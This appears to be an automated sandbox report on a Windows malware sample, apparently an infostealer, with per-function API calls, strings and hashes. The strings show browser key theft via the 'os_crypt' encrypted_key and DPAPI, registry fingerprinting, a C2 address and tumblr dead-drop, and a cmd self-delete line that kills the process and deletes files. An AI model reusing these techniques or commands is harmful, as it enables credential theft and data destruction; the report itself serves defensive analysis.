Opcode Fuzzy Hash: 29559fd7c0f8bfea2aed922a597313acc32ca1d562e348907443a2dd625172d6
Instruction Fuzzy Hash: 969157B1900209AFCB10DFA9C9859AFBBF9FF48304F54452EE506A7651E738A940CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004640D3, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 00464108
GetFileSize.KERNEL32(?,00000000), ref: 00464182
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0046419E
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 004641B2
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 004641BB
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004641CB
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004641E9
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004641F9

Strings

, xrefs: 00464155

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: ddd5431c41b4e482e9bac3aaeed306e113440fb9dfcae7e9962527fe5a873ffc
Instruction ID: 8a129dbfa4638869f91b893caa8369f02664d8e473c2117139340baf75a24eea
Opcode Fuzzy Hash: ddd5431c41b4e482e9bac3aaeed306e113440fb9dfcae7e9962527fe5a873ffc
Instruction Fuzzy Hash: 2D6105B1D00218AFDF24DFD5DC85AEEBBB8EB89344F14442AE511E7260E7389D418F56

Uniqueness

Uniqueness Score: -1.00%

Function 0045F24F, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0045F268
GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000010), ref: 0045F29B
GetProcAddress.KERNEL32(00000000), ref: 0045F2A2
_memset.LIBCMT ref: 0045F2B6
GlobalMemoryStatusEx.KERNEL32(00000000), ref: 0045F2C9

Part of subcall function 004621BC: __EH_prolog3_GS.LIBCMT ref: 004621C6

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

GlobalMemoryStatus.KERNEL32 ref: 0045F342

Strings

GlobalMemoryStatusEx, xrefs: 0045F28A
kernel32.dll, xrefs: 0045F290
MB, xrefs: 0045F2EA, 0045F35B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GlobalMemoryStatus_memmove$AddressH_prolog3H_prolog3_HandleModuleProc_memset
String ID: MB$GlobalMemoryStatusEx$kernel32.dll
API String ID: 59999723-2756951423
Opcode ID: 4b4a3dec8c0a31a5fa80798c98f0019459b135bfc2ad2fceee3c3a54d872c69d
Instruction ID: 8ce22812fdd117855182cbd810cab7dc4658fcb0650cff4aa089ca83ac53d02f
Opcode Fuzzy Hash: 4b4a3dec8c0a31a5fa80798c98f0019459b135bfc2ad2fceee3c3a54d872c69d
Instruction Fuzzy Hash: 224176B1900249ABDB01EF95CD45BDE7BF8AF54704F10442FF905E3281EB789604C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00461F90, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00461F9A
GetCurrentProcessId.KERNEL32(000000CC,0040C927), ref: 00461FA7

Part of subcall function 004616AB: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004616D6
Part of subcall function 004616AB: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004616F0
Part of subcall function 004616AB: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 004616F6

GetCurrentProcessId.KERNEL32 ref: 00461FC3

Part of subcall function 00461EAE: __EH_prolog3_catch.LIBCMT ref: 00461ECD
Part of subcall function 00461EAE: _memset.LIBCMT ref: 00461EFF
Part of subcall function 00461EAE: OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 00461F11
Part of subcall function 00461EAE: EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F28
Part of subcall function 00461EAE: GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F3E
Part of subcall function 00461EAE: CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 00461F44

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 00462097

Strings

/f & timeout /t 6 & del /f /q ", xrefs: 00461FE9
" & del C:\ProgramData\*.dll, xrefs: 00462010
/c taskkill /im , xrefs: 00461FDA
C:\Windows\System32\cmd.exe, xrefs: 00462090
& exit, xrefs: 00462026

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileH_prolog3_H_prolog3_catchModulesShell_memmove_memset
String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe
API String ID: 1929281448-455057220
Opcode ID: 2d536ac1764c597662bc426fe5b7089d1d47ffb1e56424c1ce0d6a0e6ebcf09b
Instruction ID: a45b90e52ce3f7aac79a59e641f5e3feb6d633a7628854ba5ce20b82e25033e5
Opcode Fuzzy Hash: 2d536ac1764c597662bc426fe5b7089d1d47ffb1e56424c1ce0d6a0e6ebcf09b
Instruction Fuzzy Hash: 673130B1801118BADB11EBE9CD85ECF7E7C9F15304F10456BF10AB2092EA785A44DB79

Uniqueness

Uniqueness Score: -1.00%

Function 0045FABF, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 307processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0045FAC9

Part of subcall function 00411D0F: __EH_prolog3.LIBCMT ref: 00411D16

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 004033B8: _memmove.LIBCMT ref: 00403409

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0045FB61
Process32First.KERNEL32(00000000,00000128), ref: 0045FB74
Process32Next.KERNEL32 ref: 0045FB8E

Part of subcall function 004112B7: __EH_prolog3_catch.LIBCMT ref: 004112BE

Part of subcall function 0045E95C: __EH_prolog3_catch.LIBCMT ref: 0045E963

CloseHandle.KERNEL32(?,00000000,00000128,00000002,00000000,----------,0000000A,00000001,00000000,?,00000003,00000001,004866C4,00000000,00000294,0040C27B), ref: 0045FE73

Strings

----------, xrefs: 0045FB2A
---------- , xrefs: 0045FBFF, 0045FCEF

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3_catchProcess32_memmove$CloseCreateFirstH_prolog3H_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: ----------$----------
API String ID: 4185073159-2385812570
Opcode ID: 32f60488f730a390fe677f1535dfe7cdd3af61e38bc3d6cf23919fdc9ad94679
Instruction ID: 8ce91db7c522f480c17d37f0fbaebe33bcded60df065d12fb7c244eaa261c5aa
Opcode Fuzzy Hash: 32f60488f730a390fe677f1535dfe7cdd3af61e38bc3d6cf23919fdc9ad94679
Instruction Fuzzy Hash: 30B182B1804258AEDB15EB55DC45FEEBB7CAF11304F1401AFE505B3182EA781F88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00461EAE, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00461ECD
_memset.LIBCMT ref: 00461EFF
OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 00461F11
EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F28
GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F3E
CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 00461F44

Strings

<unknown>, xrefs: 00461EE6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$BaseCloseEnumH_prolog3_catchHandleModuleModulesNameOpen_memset
String ID: <unknown>
API String ID: 3374446145-1574992787
Opcode ID: 244658bc952be1cffe53cceae16e59f270a091707551c94139565e2f8c785d96
Instruction ID: 70ade7331c1fe1be9da5477fc18033a8c7b44bd496c883d75dca9a7224712ffb
Opcode Fuzzy Hash: 244658bc952be1cffe53cceae16e59f270a091707551c94139565e2f8c785d96
Instruction Fuzzy Hash: AC218771504249AFDB15EF54DD41BEE77E4FF08704F00403AEA04EB281E7749B088BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0045EAEC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EB2E
RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0045EB4A
RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0045EB69
RegCloseKey.ADVAPI32(?), ref: 0045EB72
CharToOemA.USER32(?,?), ref: 0045EB83

Strings

ProcessorNameString, xrefs: 0045EB61
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0045EB40

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 2235053359-2804670039
Opcode ID: 59a469b855a62e4a5ecf8f7ef6647ec79b3c9db86dd270e6ff7ec8897400576d
Instruction ID: e5e815bb453eb4dbf6689d64094a2c7938900b3b26400d3e7cd6629269ae5e11
Opcode Fuzzy Hash: 59a469b855a62e4a5ecf8f7ef6647ec79b3c9db86dd270e6ff7ec8897400576d
Instruction Fuzzy Hash: 42216DB190424CAFDB30DFA4DC84AEE7BBCEF15348F10447AE919D7152EA345A088B65

Uniqueness

Uniqueness Score: -1.00%

Function 0045EC34, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EC76
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0045EC92
RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0045ECB1
RegCloseKey.ADVAPI32(?), ref: 0045ECBA
CharToOemA.USER32(?,?), ref: 0045ECCB

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0045EC88
ProductName, xrefs: 0045ECA9

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 2235053359-1787575317
Opcode ID: fb38d4f1524cbc1eef628860479bf1518489fabc99d4b65495c1e7c7711b9ca3
Instruction ID: 8c379a4b8820a6916782180dcbdc89a7d23e9e80b5a7728a3b93e77e92fed359
Opcode Fuzzy Hash: fb38d4f1524cbc1eef628860479bf1518489fabc99d4b65495c1e7c7711b9ca3
Instruction Fuzzy Hash: 32216DB190424DAFDB30EFA4DC84AEE7BBCFF14348F10447AE919D7152EA745A088B65

Uniqueness

Uniqueness Score: -1.00%

Function 0045EDB3, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EDF5
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0045EE11
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,00000000), ref: 0045EE30
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0045EE39
CharToOemA.USER32(?,?), ref: 0045EE4A

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0045EE07
MachineGuid, xrefs: 0045EE28

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: cc653df27aaf93323914dfb0520260598cb783b32ea9075a7831db828e9480f3
Instruction ID: 0909bb7c1e98fc66e2fd51660931112c9996f97626bdb88c53b1cc856b6dd3fd
Opcode Fuzzy Hash: cc653df27aaf93323914dfb0520260598cb783b32ea9075a7831db828e9480f3
Instruction Fuzzy Hash: 83117FB150024DAFEB30EFA4DC85BEE7BACFB14348F10407AE919D7152EA745A088F65

Uniqueness

Uniqueness Score: -1.00%

Function 00432148, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 208fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00432191
CreateFileW.KERNEL32(?,?,00000003,00000000,?,?,00000000), ref: 00432278

Strings

cF, xrefs: 00432243
ddF, xrefs: 00432278
winOpen, xrefs: 004322BA
psow, xrefs: 00432368

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile_memset
String ID: cF$ddF$psow$winOpen
API String ID: 3830271748-1418711217
Opcode ID: d213770175949e555960944134189dcef17fad84c3b032168ec75193dd8a712a
Instruction ID: 3535a192b4445eba7f2e29df45c10ff6563ae44010a3d6673375a26cd596bd34
Opcode Fuzzy Hash: d213770175949e555960944134189dcef17fad84c3b032168ec75193dd8a712a
Instruction Fuzzy Hash: 01717E71E00219AFDF009FA5DE42ADEBBB0FB08714F14456BE914B7290D3B89E50CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413A4A, Relevance: 10.6, APIs: 7, Instructions: 137stringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00413A69
_memset.LIBCMT ref: 00413A93

Part of subcall function 004602E7: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040FCF1,?,0000001A,?,?,?,?,0049B0CC,00000000), ref: 00460301

lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 00413AB4
_memset.LIBCMT ref: 00413ABF
lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413AD2
lstrcatA.KERNEL32(?,004867F4,?,?,?,?,?,00000014), ref: 00413AE0
lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 00413AEF

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$FolderH_prolog3Path
String ID:
API String ID: 1637166636-0
Opcode ID: 1db8fc0d0761bfea98cbaff21caedd78698e921d31283b58dc0fde23c79e8200
Instruction ID: a314fbcfd3a24dd60db52ac6297fed33d3015c10456b263d896aaa7e8f6e0ff5
Opcode Fuzzy Hash: 1db8fc0d0761bfea98cbaff21caedd78698e921d31283b58dc0fde23c79e8200
Instruction Fuzzy Hash: 8251217280414DABCB20EFA5DC85EDF77BCEB04304F00416BF905A7141EA389748CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042A30C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042A34E
_memmove.LIBCMT ref: 0042A36B
ReadFile.KERNEL32(?,?,?,?,?), ref: 0042A3B8
_memset.LIBCMT ref: 0042A414

Strings

winRead, xrefs: 0042A3EC
,cF, xrefs: 0042A3B8

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$FileRead_memset
String ID: ,cF$winRead
API String ID: 1942371898-879906288
Opcode ID: 39824cf0660f830ba8e04b238d3064b98fac8a0a859c732e22709e7ead5e247d
Instruction ID: 5b9fb1e42073cd2a928d124bcd6f12092a543c3ca2153f5e9d5f560ccb1dd320
Opcode Fuzzy Hash: 39824cf0660f830ba8e04b238d3064b98fac8a0a859c732e22709e7ead5e247d
Instruction Fuzzy Hash: F3315972A002199BCF00DE68ED8699E3BA5EF44358B54402AFD01DB241D774EE608B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00467CC1, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00467CDB

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

std::exception::exception.LIBCMT ref: 00467D10
std::exception::exception.LIBCMT ref: 00467D2A
__CxxThrowException@8.LIBCMT ref: 00467D3B

Strings

bad allocation, xrefs: 00467D09
8-@, xrefs: 00467CF3

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: 8-@$bad allocation
API String ID: 615853336-3215286821
Opcode ID: 48fa6f9bf025f085f717d2a59c28ab419e2651d33dda2efd0479edcfb90e60d6
Instruction ID: e5e35db4f3df075466cb9016febb363e0c7d67cddac03f6e487767e48cf787d6
Opcode Fuzzy Hash: 48fa6f9bf025f085f717d2a59c28ab419e2651d33dda2efd0479edcfb90e60d6
Instruction Fuzzy Hash: 5AF0F471508309B6DF00EB56DD42AAE3BA8BB0031CF10543FF500A66A2FBBC9A01874E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAD7, Relevance: 9.1, APIs: 6, Instructions: 62filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040EAEF
GetFileSizeEx.KERNEL32(00000000,?), ref: 0040EB06
LocalAlloc.KERNEL32(00000040,?), ref: 0040EB22
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040EB3C
LocalFree.KERNEL32(?), ref: 0040EB52
FindCloseChangeNotification.KERNEL32(?), ref: 0040EB5D

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: c2324f482fb4666a30dba985fd5f93fc157b250215621647210ee42081955b2d
Instruction ID: 034b4776d24a0182819bf915acfe8b05d1ccc97a12e461bbb3cfa376d772529a
Opcode Fuzzy Hash: c2324f482fb4666a30dba985fd5f93fc157b250215621647210ee42081955b2d
Instruction Fuzzy Hash: 22113071500205FFDB10AFA5DC88AAE7BB8FB04711F200D39F512B2290D735AE54CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00461D79, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00461D80
Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,00000038,0040B38F,?,00000019), ref: 00461DC8
__time64.LIBCMT ref: 00461DD0

Part of subcall function 0046889C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00461DD5,00000000), ref: 004688A7
Part of subcall function 0046889C: __aulldiv.LIBCMT ref: 004688C7

Part of subcall function 0046002B: _malloc.LIBCMT ref: 00460033
Part of subcall function 0046002B: GetTickCount.KERNEL32 ref: 0046003E
Part of subcall function 0046002B: _rand.LIBCMT ref: 00460053
Part of subcall function 0046002B: _sprintf.LIBCMT ref: 00460066

Part of subcall function 0046B2D8: __getptd.LIBCMT ref: 0046B2DD

_rand.LIBCMT ref: 00461DFD

Part of subcall function 0046B2EA: __getptd.LIBCMT ref: 0046B2EA

Part of subcall function 00460380: std::_Xinvalid_argument.LIBCPMT ref: 0046038E

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00461D9B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time__getptd_rand$CountFileH_prolog3_catch_SleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 503986416-374730529
Opcode ID: ec577f3ad1545ca5e3d2dacffa2ec0d59528fdd9c29a621d179bb820e062212f
Instruction ID: 88f4b045568469931c6319c2667ea5b9293ab10806897224fd332c4c367be4ef
Opcode Fuzzy Hash: ec577f3ad1545ca5e3d2dacffa2ec0d59528fdd9c29a621d179bb820e062212f
Instruction Fuzzy Hash: 0121D271900304ABDB14EFA6D846BADBBB4BF50705F10045FF2016B1C2DBB85605CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0045F8AA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0045F8B4
GetSystemTime.KERNEL32(?,000000F4,0040BFA4,00000001,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 0045F8D5
GetTimeZoneInformation.KERNEL32(00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 0045F8E2
TzSpecificLocalTimeToSystemTime.KERNEL32(00000001,?,?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 0045F905

Part of subcall function 004622C5: __EH_prolog3.LIBCMT ref: 004622CF

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

UTC, xrefs: 0045F93D

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$System$H_prolog3H_prolog3_InformationLocalSpecificZone_memmove
String ID: UTC
API String ID: 473020483-2754919731
Opcode ID: 6b7e28b0250761da46142a86de250f18920cee604e328b6b8a4b1076da63f701
Instruction ID: 9d29b071ca3e0d0fda31ed6a18f578b55765b9cd6ea7bdb432508796c030d5f2
Opcode Fuzzy Hash: 6b7e28b0250761da46142a86de250f18920cee604e328b6b8a4b1076da63f701
Instruction Fuzzy Hash: 5B119D7184011EBFDB51EBE4DC09BEEB778BF08705F0044BAE204F2050EB749A548B19

Uniqueness

Uniqueness Score: -1.00%

Function 00464353, Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004643A7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004643E1

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: d9a86151411ddb3e0fa1df4da690f01b861f4dc52d65d6d7e1e68af288fb2a27
Instruction ID: 8462f6e7d2977f95d40d6420188b9f6b58f601cbe8092f24080167b48dedebbf
Opcode Fuzzy Hash: d9a86151411ddb3e0fa1df4da690f01b861f4dc52d65d6d7e1e68af288fb2a27
Instruction Fuzzy Hash: 2D31CEB0500705EFDF309F258885B277AE8FB54358F108B3FE29682640E778EC858B1A

Uniqueness

Uniqueness Score: -1.00%

Function 0041159A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004115A1

Part of subcall function 0040EAD7: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040EAEF
Part of subcall function 0040EAD7: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040EB06
Part of subcall function 0040EAD7: LocalAlloc.KERNEL32(00000040,?), ref: 0040EB22
Part of subcall function 0040EAD7: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040EB3C
Part of subcall function 0040EAD7: FindCloseChangeNotification.KERNEL32(?), ref: 0040EB5D

Part of subcall function 0045FFED: LocalAlloc.KERNEL32(00000040,?,?,?,004115DE,?,?), ref: 00460005

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

Strings

DPAPI, xrefs: 00411665
, xrefs: 0041168E
"os_crypt":{"encrypted_key":", xrefs: 004115E8

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AllocLocal$ChangeCloseCreateFindH_prolog3_NotificationReadSizeXinvalid_argument_memmovestd::_
String ID: $"os_crypt":{"encrypted_key":"$DPAPI
API String ID: 3192152120-2919755482
Opcode ID: 8a0013914b4d289f59e4fc7b5988c9e7c60a16f85a90e56ee2bfdfc03a19705d
Instruction ID: 2fee513b1028514a7298ca10d2558cbba36ebad82446db23027957686835b13d
Opcode Fuzzy Hash: 8a0013914b4d289f59e4fc7b5988c9e7c60a16f85a90e56ee2bfdfc03a19705d
Instruction Fuzzy Hash: F8316FB2D10208ABDF18EFA5DC81EEE7774AF14314F14452FF511722D1EB3999458B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1B2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B1B9

Part of subcall function 0040B048: __EH_prolog3_GS.LIBCMT ref: 0040B052
Part of subcall function 0040B048: DeleteUrlCacheEntry.WININET(?), ref: 0040B082
Part of subcall function 0040B048: DeleteUrlCacheEntry.WININET(00000000), ref: 0040B0A4
Part of subcall function 0040B048: InternetOpenA.WININET(004866C4,00000000,00000000,00000000,00000000), ref: 0040B0BD
Part of subcall function 0040B048: InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0040B0F4
Part of subcall function 0040B048: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 0040B118
Part of subcall function 0040B048: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B129
Part of subcall function 0040B048: InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040B147
Part of subcall function 0040B048: InternetCloseHandle.WININET(00000000), ref: 0040B15B
Part of subcall function 0040B048: InternetCloseHandle.WININET(00000000), ref: 0040B162
Part of subcall function 0040B048: InternetCloseHandle.WININET(?), ref: 0040B16E

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

_strtok.LIBCMT ref: 0040B285

Strings

.tumblr.com, xrefs: 0040B20A
188.34.200.103, xrefs: 0040B28F

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle_memmove$CacheDeleteEntryH_prolog3_HttpOpenRequest$ConnectFileReadSendXinvalid_argument_strtokstd::_
String ID: .tumblr.com$188.34.200.103
API String ID: 1242742592-447660756
Opcode ID: 1cad7a4a33bf8d552a361b4da5d35ea019b12470e6d62a8435979938b5558eb4
Instruction ID: 2308c358fd5106b75575a59d7252b71c1f3012af43e2e273293884e8a273a31d
Opcode Fuzzy Hash: 1cad7a4a33bf8d552a361b4da5d35ea019b12470e6d62a8435979938b5558eb4
Instruction Fuzzy Hash: DD319571C00308AEDB04EBA9C956ADDBB78DF15308F10816FF515B71C2DB781A48D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D995, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040D9A3
_strcpy_s.LIBCMT ref: 0040D9B9
_memset.LIBCMT ref: 0040D9D4

Strings

1BEF0A57BE110FD467A, xrefs: 0040D9AB

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: 86b6b00ca2f02f14dd942adcd233f2d8246cd2dd4ced8368904fe24d86dc92ab
Instruction ID: 2b9f701e0afc28fe8336a1a9b351877273890074c42d5f63b02f405e389192a9
Opcode Fuzzy Hash: 86b6b00ca2f02f14dd942adcd233f2d8246cd2dd4ced8368904fe24d86dc92ab
Instruction Fuzzy Hash: B9F031B0640704AFC720DF65C842B8B7BE8EB08714F40481EF949D7741E779F8008BA5

Uniqueness

Uniqueness Score: -1.00%
